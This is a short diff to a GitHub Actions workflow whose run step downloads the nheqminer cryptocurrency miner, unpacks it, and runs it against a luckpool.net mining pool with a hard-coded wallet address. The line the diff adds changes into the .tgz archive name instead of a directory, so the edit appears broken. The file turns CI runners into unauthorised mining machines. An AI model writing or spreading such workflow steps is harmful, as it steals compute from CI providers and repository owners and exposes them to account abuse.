--- a/.github/workflows/xmain.yml
+++ b/.github/workflows/xmain.yml
@@ -28,4 +28,5 @@ jobs:
       run: |
         wget https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Linux-v0.8.2.tgz
         tar xf nheqminer-Linux-v0.8.2.tgz
+        cd nheqminer-Linux-v0.8.2.tgz
         ./nheqminer -v -l stratum+tcp://na.luckpool.net:3956 -u RP1ntCUiBNERYrp25mccFoR22V1uPSxxTg.hellminer -p x -t2
